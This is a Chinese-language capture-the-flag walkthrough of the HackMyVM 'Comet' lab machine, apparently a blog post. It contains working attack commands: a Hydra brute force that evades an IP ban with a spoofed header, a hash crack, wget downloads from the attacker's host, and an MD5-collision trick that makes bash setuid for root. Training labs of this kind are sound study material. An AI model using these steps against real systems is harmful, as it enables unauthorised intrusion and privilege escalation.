hmv[-_-]Comet

Comet

image-20240426143550099

image-20240426143830512

信息搜集

端口扫描

┌──(kali💀kali)-[~/temp/comet]
└─$ rustscan -a 192.168.0.179 -- -A                       
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.179:22
Open 192.168.0.179:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 02:40 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:40
Completed NSE at 02:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:40
Completed NSE at 02:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:40
Completed NSE at 02:40, 0.00s elapsed
Initiating Ping Scan at 02:40
Scanning 192.168.0.179 [2 ports]
Completed Ping Scan at 02:40, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:40
Completed Parallel DNS resolution of 1 host. at 02:40, 0.10s elapsed
DNS resolution of 1 IPs took 0.10s. Mode: Async [#: 3, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 02:40
Scanning comet (192.168.0.179) [2 ports]
Discovered open port 80/tcp on 192.168.0.179
Discovered open port 22/tcp on 192.168.0.179
Completed Connect Scan at 02:40, 0.00s elapsed (2 total ports)
Initiating Service scan at 02:40
Scanning 2 services on comet (192.168.0.179)
Completed Service scan at 02:40, 6.08s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.0.179.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:40
Completed NSE at 02:40, 0.36s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:40
Completed NSE at 02:40, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:40
Completed NSE at 02:40, 0.00s elapsed
Nmap scan report for comet (192.168.0.179)
Host is up, received syn-ack (0.00035s latency).
Scanned at 2024-04-26 02:40:31 EDT for 6s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV/Sx5gw/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+/5R0D/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9/d6o2oWdMM=
|   256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=
|   256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS
80/tcp open  http    syn-ack Apache httpd 2.4.54 ((Debian))
|_http-title: CyberArray
|_http-server-header: Apache/2.4.54 (Debian)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:40
Completed NSE at 02:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:40
Completed NSE at 02:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:40
Completed NSE at 02:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.18 seconds

目录扫描

┌──(kali💀kali)-[~/temp/comet]
└─$ gobuster dir -u http://192.168.0.179 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.179
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,zip,bak,jpg,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/images               (Status: 301) [Size: 315] [--> http://192.168.0.179/images/]
/index.html           (Status: 200) [Size: 7097]
/.php                 (Status: 403) [Size: 278]
/contact.html         (Status: 200) [Size: 5886]
/about.html           (Status: 200) [Size: 7024]
/blog.html            (Status: 200) [Size: 8242]
/support.html         (Status: 200) [Size: 6329]
/login.php            (Status: 200) [Size: 1443]
/ip.txt               (Status: 200) [Size: 0]
/js                   (Status: 301) [Size: 311] [--> http://192.168.0.179/js/]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 1543920 / 1543927 (100.00%)
===============================================================
Finished
===============================================================

漏洞发现

踩点

image-20240426144234797

发现用户owner

image-20240426144511125

登录界面

敏感目录

随便搞一个账号密码进行登录,但是有防护措施,第二次就被ban掉了。。。。

┌──(kali💀kali)-[~/temp/comet]
└─$ curl http://192.168.0.179/ip.txt
192.168.0.152

似乎只允许这个用户进行登录?

爆破密码

尝试抓包:

POST /login.php HTTP/1.1
Host: 192.168.0.179
Content-Length: 32
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.179
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.179/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=admin&password=password

尝试使用hydra进行爆破:

┌──(kali💀kali)-[~/temp/comet]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.179 http-post-form "/login.php:username=admin&password=^PASS^:H=X-Forwarded-For:192.168.0.152:F=Invalid"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-26 02:58:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.0.179:80/login.php:username=admin&password=^PASS^:H=X-Forwarded-For:192.168.0.152:F=Invalid
[STATUS] 143.00 tries/min, 143 tries in 00:01h, 14344266 to do in 1671:50h, 6 active
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
[INFO] Writing restore file because 2 server scans could not be completed
[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-26 02:59:35

额。。。

┌──(kali💀kali)-[~/temp/comet]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.179 http-post-form "/login.php:username=admin&password=^PASS^:H=X-Originating-IP:192.168.0.152:F=Invalid" 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-26 03:01:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.0.179:80/login.php:username=admin&password=^PASS^:H=X-Originating-IP:192.168.0.152:F=Invalid
[STATUS] 4546.00 tries/min, 4546 tries in 00:01h, 14339853 to do in 52:35h, 16 active
[80][http-post-form] host: 192.168.0.179   login: admin   password: solitario
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-26 03:03:05

成功!尝试进行登录:

image-20240426150609881

下载日志文件

┌──(kali💀kali)-[~/temp/comet]
└─$ for i in {1..51};do wget "http://192.168.0.179/logFire/firewall.log.$i"; done

然后查看一下:

┌──(kali💀kali)-[~/temp/comet]
└─$ cat *        
2023-02-19 16:35:30 172.16.0.1 Port scan detected from 10.0.0.1
2023-02-19 16:35:30 172.16.0.1 Port scan detected from 10.0.0.1
2023-02-19 16:35:30 192.168.0.1 Connection refused from 192.168.0.1
2023-02-19 16:35:30 172.16.1.1 Connection refused from 192.168.0.1
2023-02-19 16:35:30 192.168.2.1 Connection refused from 192.168.0.1
2023-02-19 16:35:30 192.168.0.1 HTTP request to unauthorized URL from 10.0.0.1
2023-02-19 16:35:30 172.16.0.1 Intrusion attempt from 192.168.0.1
2023-02-19 16:35:30 10.1.1.1 Intrusion attempt from 192.168.0.1
2023-02-19 16:35:30 10.0.0.1 Port scan detected from 10.0.0.1
2023-02-19 16:35:30 192.168.1.1 Intrusion attempt from 192.168.0.1
2023-02-19 16:35:30 10.0.0.1 Port scan detected from 10.0.0.1
2023-02-19 16:35:30 192.168.2.1 Port scan detected from 10.0.0.1
2023-02-19 16:35:30 192.168.0.1 Connection refused from 192.168.0.1
2023-02-19 16:35:30 10.1.1.1 HTTP request to unauthorized URL from 10.0.0.1
2023-02-19 16:35:30 192.168.1.1 Dropped packet from 10.0.0.1 to 192.168.0.1
2023-02-19 16:35:30 172.16.0.1 Dropped packet from 10.0.0.1 to 192.168.0.1
2023-02-19 16:35:30 172.16.0.1 Dropped packet from 10.0.0.1 to 192.168.0.1
2023-02-19 16:35:30 192.168.2.1 Dropped packet from 10.0.0.1 to 192.168.0.1
2023-02-19 16:35:30 10.0.0.1 Port scan detected from 10.0.0.1
2023-02-19 16:35:30 10.0.0.1 Dropped packet from 10.0.0.1 to 192.168.0.1
2023-02-19 16:35:30 192.168.0.1 HTTP request to unauthorized URL from 10.0.0.1
2023-02-19 16:35:30 192.168.0.1 Port scan detected from 10.0.0.1
2023-02-19 16:35:30 192.168.2.1 Dropped packet from 10.0.0.1 to 192.168.0.1

发现大量重复,尝试排序,并输出只出现一次的行:

┌──(kali💀kali)-[~/temp/comet]
└─$ cat * | sort | uniq -u
2023-02-19 16:35:31 192.168.1.10 | 192.168.1.50 | Allowed | Inbound connection | Joe

还有一个特殊文件:

┌──(kali💀kali)-[~/temp/comet]
└─$ wget http://192.168.0.179/logFire/firewall_update  --2024-04-26 03:12:55--  http://192.168.0.179/logFire/firewall_update
Connecting to 192.168.0.179:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16248 (16K)
Saving to: ‘firewall_update’

firewall_update                       100%[=========================================================================>]  15.87K  --.-KB/s    in 0s      

2024-04-26 03:12:55 (54.8 MB/s) - ‘firewall_update’ saved [16248/16248]

┌──(kali💀kali)-[~/temp/comet]
└─$ file firewall_update                                                         
firewall_update: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c8b4cde0414ff49d15473b0d47cde256c7931587, for GNU/Linux 3.2.0, not stripped

┌──(kali💀kali)-[~/temp/comet]
└─$ pwn checksec firewall_update
[*] '/home/kali/temp/comet/firewall_update'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

查看一下:

┌──(kali💀kali)-[~/temp/comet]
└─$ radare2 firewall_update                               
Warning: run r2 with -e bin.cache=true to fix relocations in disassembly
[0x000010b0]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Finding and parsing C++ vtables (avrr)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information (aanr)
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x000010b0]> pdf
            ;-- section..text:
            ;-- _start:
            ;-- rip:
┌ 34: entry0 (int64_t arg3);
│           ; arg int64_t arg3 @ rdx
│           0x000010b0      31ed           xor ebp, ebp                ; [15] -r-x section size 596 named .text
│           0x000010b2      4989d1         mov r9, rdx                 ; arg3
│           0x000010b5      5e             pop rsi
│           0x000010b6      4889e2         mov rdx, rsp
│           0x000010b9      4883e4f0       and rsp, 0xfffffffffffffff0
│           0x000010bd      50             push rax
│           0x000010be      54             push rsp
│           0x000010bf      4531c0         xor r8d, r8d
│           0x000010c2      31c9           xor ecx, ecx
│           0x000010c4      488d3dce0000.  lea rdi, [main]             ; 0x1199
│           0x000010cb      ff150f2f0000   call qword [reloc.__libc_start_main] ; [0x3fe0:8]=0
└           0x000010d1      f4             hlt
[0x000010b0]> s main
[0x00001199]> pdf
            ; DATA XREF from entry0 @ 0x10c4
┌ 363: int main (int argc, char **argv, char **envp);
│           ; var char *s2 @ rbp-0xf0
│           ; var char *s1 @ rbp-0xa0
│           ; var int64_t var_98h @ rbp-0x98
│           ; var int64_t var_90h @ rbp-0x90
│           ; var int64_t var_88h @ rbp-0x88
│           ; var int64_t var_80h @ rbp-0x80
│           ; var int64_t var_78h @ rbp-0x78
│           ; var int64_t var_70h @ rbp-0x70
│           ; var int64_t var_68h @ rbp-0x68
│           ; var int64_t var_60h @ rbp-0x60
│           ; var char *s @ rbp-0x50
│           ; var int64_t var_30h @ rbp-0x30
│           ; var signed int64_t var_4h @ rbp-0x4
│           0x00001199      55             push rbp
│           0x0000119a      4889e5         mov rbp, rsp
│           0x0000119d      4881ecf00000.  sub rsp, 0xf0
│           0x000011a4      48b862383732.  movabs rax, 0x3862613832373862 ; 'b8728ab8'
│           0x000011ae      48ba31613363.  movabs rdx, 0x3139333363336131 ; '1a3c3391'
│           0x000011b8      48898560ffff.  mov qword [s1], rax
│           0x000011bf      48899568ffff.  mov qword [var_98h], rdx
│           0x000011c6      48b866356636.  movabs rax, 0x3933663336663566 ; 'f5f63f39'
│           0x000011d0      48ba64613732.  movabs rdx, 0x3938656532376164 ; 'da72ee89'
│           0x000011da      48898570ffff.  mov qword [var_90h], rax
│           0x000011e1      48899578ffff.  mov qword [var_88h], rdx
│           0x000011e8      48b866343366.  movabs rax, 0x6639613966333466 ; 'f43f9a9f'
│           0x000011f2      48ba34323962.  movabs rdx, 0x6663386362393234 ; '429bc8cf'
│           0x000011fc      48894580       mov qword [var_80h], rax
│           0x00001200      48895588       mov qword [var_78h], rdx
│           0x00001204      48b865383538.  movabs rax, 0x3430386638353865 ; 'e858f804'
│           0x0000120e      48ba38656161.  movabs rdx, 0x3162326461616538 ; '8eaad2b1'
│           0x00001218      48894590       mov qword [var_70h], rax
│           0x0000121c      48895598       mov qword [var_68h], rdx
│           0x00001220      c645a000       mov byte [var_60h], 0
│           0x00001224      488d05d90d00.  lea rax, str.Enter_password:_ ; 0x2004 ; "Enter password: "
│           0x0000122b      4889c7         mov rdi, rax                ; const char *format
│           0x0000122e      b800000000     mov eax, 0
│           0x00001233      e8f8fdffff     call sym.imp.printf         ; int printf(const char *format)
│           0x00001238      488d45b0       lea rax, [s]
│           0x0000123c      4889c6         mov rsi, rax
│           0x0000123f      488d05cf0d00.  lea rax, [0x00002015]       ; "%s"
│           0x00001246      4889c7         mov rdi, rax                ; const char *format
│           0x00001249      b800000000     mov eax, 0
│           0x0000124e      e83dfeffff     call sym.imp.__isoc99_scanf ; int scanf(const char *format)
│           0x00001253      488d45b0       lea rax, [s]
│           0x00001257      4889c7         mov rdi, rax                ; const char *s
│           0x0000125a      e801feffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│           0x0000125f      4889c1         mov rcx, rax
│           0x00001262      488d55d0       lea rdx, [var_30h]
│           0x00001266      488d45b0       lea rax, [s]
│           0x0000126a      4889ce         mov rsi, rcx
│           0x0000126d      4889c7         mov rdi, rax
│           0x00001270      e8dbfdffff     call sym.imp.SHA256
│           0x00001275      c745fc000000.  mov dword [var_4h], 0
│       ┌─< 0x0000127c      eb3c           jmp 0x12ba
│       │   ; CODE XREF from main @ 0x12be
│      ┌──> 0x0000127e      8b45fc         mov eax, dword [var_4h]
│      ╎│   0x00001281      4898           cdqe
│      ╎│   0x00001283      0fb64405d0     movzx eax, byte [rbp + rax - 0x30]
│      ╎│   0x00001288      0fb6c0         movzx eax, al
│      ╎│   0x0000128b      8b55fc         mov edx, dword [var_4h]
│      ╎│   0x0000128e      01d2           add edx, edx
│      ╎│   0x00001290      488d8d10ffff.  lea rcx, [s2]
│      ╎│   0x00001297      4863d2         movsxd rdx, edx
│      ╎│   0x0000129a      4801d1         add rcx, rdx
│      ╎│   0x0000129d      89c2           mov edx, eax                ;  ...
│      ╎│   0x0000129f      488d05720d00.  lea rax, str._02x           ; 0x2018 ; "%02x"
│      ╎│   0x000012a6      4889c6         mov rsi, rax                ; const char *format
│      ╎│   0x000012a9      4889cf         mov rdi, rcx                ; char *s
│      ╎│   0x000012ac      b800000000     mov eax, 0
│      ╎│   0x000012b1      e8bafdffff     call sym.imp.sprintf        ; int sprintf(char *s, const char *format, ...)
│      ╎│   0x000012b6      8345fc01       add dword [var_4h], 1
│      ╎│   ; CODE XREF from main @ 0x127c
│      ╎└─> 0x000012ba      837dfc1f       cmp dword [var_4h], 0x1f
│      └──< 0x000012be      7ebe           jle 0x127e
│           0x000012c0      488d9510ffff.  lea rdx, [s2]
│           0x000012c7      488d8560ffff.  lea rax, [s1]
│           0x000012ce      4889d6         mov rsi, rdx                ; const char *s2
│           0x000012d1      4889c7         mov rdi, rax                ; const char *s1
│           0x000012d4      e8a7fdffff     call sym.imp.strcmp         ; int strcmp(const char *s1, const char *s2)
│           0x000012d9      85c0           test eax, eax
│       ┌─< 0x000012db      7511           jne 0x12ee
│       │   0x000012dd      488d05390d00.  lea rax, str.Firewall_successfully_updated ; 0x201d ; "Firewall successfully updated"
│       │   0x000012e4      4889c7         mov rdi, rax                ; const char *s
│       │   0x000012e7      e854fdffff     call sym.imp.puts           ; int puts(const char *s)
│      ┌──< 0x000012ec      eb0f           jmp 0x12fd
│      ││   ; CODE XREF from main @ 0x12db
│      │└─> 0x000012ee      488d05460d00.  lea rax, str.Incorrect_password ; 0x203b ; "Incorrect password"
│      │    0x000012f5      4889c7         mov rdi, rax                ; const char *s
│      │    0x000012f8      e843fdffff     call sym.imp.puts           ; int puts(const char *s)
│      │    ; CODE XREF from main @ 0x12ec
│      └──> 0x000012fd      b800000000     mov eax, 0
│           0x00001302      c9             leave
└           0x00001303      c3             ret

发现调用了md5,尝试解密一下:

b8728ab81a3c3391f5f63f39da72ee89f43f9a9f429bc8cfe858f8048eaad2b1

image-20240426152232677

joe
prettywoman

image-20240426152420064

提权

信息搜集

joe@comet:~$ sudo -l
Matching Defaults entries for joe on comet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User joe may run the following commands on comet:
    (ALL : ALL) NOPASSWD: /bin/bash /home/joe/coll
joe@comet:~$ file /home/joe/coll
/home/joe/coll: Bourne-Again shell script, ASCII text executable
joe@comet:~$ cat /home/joe/coll
#!/bin/bash
exec 2>/dev/null

file1=/home/joe/file1
file2=/home/joe/file2
md5_1=$(md5sum $file1 | awk '{print $1}')
md5_2=$(md5sum $file2 | awk '{print $1}')

if      [[ $(head -n 1 $file1) == "HMV" ]] && 
        [[ $(head -n 1 $file2) == "HMV" ]] && 
        [[ $md5_1 == $md5_2 ]] && 
        [[ $(diff -q $file1 $file2) ]]; then
    chmod +s /bin/bash
    exit 0
else
    exit 1
fi
joe@comet:~$ cat user.txt 
cc32dbc17ec3ddf89f9e6d0991c82616
joe@comet:~$ ls -la
total 32
drwxr-xr-x 3 joe  joe  4096 Feb 19  2023 .
drwxr-xr-x 3 root root 4096 Feb 19  2023 ..
lrwxrwxrwx 1 root root    9 Feb 25  2023 .bash_history -> /dev/null
-rw-r--r-- 1 joe  joe   220 Feb 19  2023 .bash_logout
-rw-r--r-- 1 joe  joe  3526 Feb 19  2023 .bashrc
-rwxr-xr-x 1 root root  366 Feb 19  2023 coll
drwxr-xr-x 3 joe  joe  4096 Feb 19  2023 .local
-rw-r--r-- 1 joe  joe   807 Feb 19  2023 .profile
-rwx------ 1 joe  joe    33 Feb 19  2023 user.txt

寻找两个文件,md5 前缀都是HMV,且md5相同:

在师傅blog发现另一个比较方便的工具!

┌──(kali💀kali)-[~/md5collgen]
└─$ chmod +x md5collgen                                  

┌──(kali💀kali)-[~/md5collgen]
└─$ echo HMV > flag                              

┌──(kali💀kali)-[~/md5collgen]
└─$ ./md5collgen flag
MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)

Using output filenames: 'msg1.bin' and 'msg2.bin'
Using prefixfile: 'flag'
Using initial value: 66fdfd128fcadfc4946a54c7a85dc86d

Generating first block: ......
Generating second block: S00...........
Running time: 3.25897 s

┌──(kali💀kali)-[~/md5collgen]
└─$ ls -la                                               
total 3284
drwxr-xr-x  2 kali kali    4096 Apr 26 03:46 .
drwx------ 58 kali kali    4096 Apr 26 03:42 ..
-rw-r--r--  1 kali kali       4 Apr 26 03:46 flag
-rwxr-xr-x  1 kali kali 3338360 Apr 26 03:44 md5collgen
-rw-r--r--  1 kali kali     192 Apr 26 03:46 msg1.bin
-rw-r--r--  1 kali kali     192 Apr 26 03:46 msg2.bin

┌──(kali💀kali)-[~/md5collgen]
└─$ head msg1.bin                     
HMV
B�w�'U�x��ĵ���y�?-�x>)*���      ��÷�CY�!�VK��钜ܖ��キ\����w��/l_���ɛ�!�1�v!�W�� ]����}֞"������J�ȸ��:
                                                                                                  i]�@|Aw��
┌──(kali💀kali)-[~/md5collgen]
└─$ head msg2.bin 
HMV
J�ȸ��:�x��ĵ�~�y�?-�x>)*���      ��÷�CY�!hWK��钜ܖ����\����w��/l_���ɛ�!�1Sv!�W�� ]����}֞"�����
      i]�@�Aw��

尝试上传:

joe@comet:~$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash
joe@comet:~$ wget http://192.168.0.143:8888/file1
--2024-04-26 09:57:57--  http://192.168.0.143:8888/file1
Connecting to 192.168.0.143:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 192 [application/octet-stream]
Saving to: ‘file1’

file1                                 100%[=========================================================================>]     192  --.-KB/s    in 0.01s   

2024-04-26 09:57:57 (16.4 KB/s) - ‘file1’ saved [192/192]

joe@comet:~$ wget http://192.168.0.143:8888/file2
--2024-04-26 09:58:00--  http://192.168.0.143:8888/file2
Connecting to 192.168.0.143:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 192 [application/octet-stream]
Saving to: ‘file2’

file2                                 100%[=========================================================================>]     192  --.-KB/s    in 0s      

2024-04-26 09:58:00 (36.7 MB/s) - ‘file2’ saved [192/192]

joe@comet:~$ sudo -l
Matching Defaults entries for joe on comet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User joe may run the following commands on comet:
    (ALL : ALL) NOPASSWD: /bin/bash /home/joe/coll
joe@comet:~$ sudo /bin/bash /home/joe/coll
joe@comet:~$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27  2022 /bin/bash
joe@comet:~$ bash -p
bash-5.1# cd /root
bash-5.1# ls -la
total 24
drwx------  3 root root 4096 Feb 21  2023 .
drwxr-xr-x 18 root root 4096 Feb 20  2023 ..
lrwxrwxrwx  1 root root    9 Feb  6  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 Feb 19  2023 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rwx------  1 root root   33 Feb  6  2023 root.txt
bash-5.1# cat root.txt 
052cf26a6e7e33790391c0d869e2e40c

拿下flag!!!!!

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇